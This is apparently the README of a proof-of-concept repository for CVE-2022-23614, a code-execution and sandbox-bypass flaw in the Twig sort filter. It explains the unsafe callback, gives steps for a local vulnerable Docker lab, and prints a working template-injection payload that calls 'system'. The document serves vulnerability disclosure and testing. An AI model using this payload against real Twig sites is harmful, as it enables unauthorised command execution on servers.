PoC for CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Twig sort filter code execution/sandbox bypass)
As seen in this commit - https://github.com/twigphp/Twig/commit/.., twig was passing user supplied function name as a callback parameter to uasort (here), thus leading to arbitrary code execution
To build and run the docker container with a vulnerable twig version
$ ./build-docker.shOpen the webpage at localhost:1337 and try rendering the following payload
{{ ['id','']|sort('system') }}PoC
Result
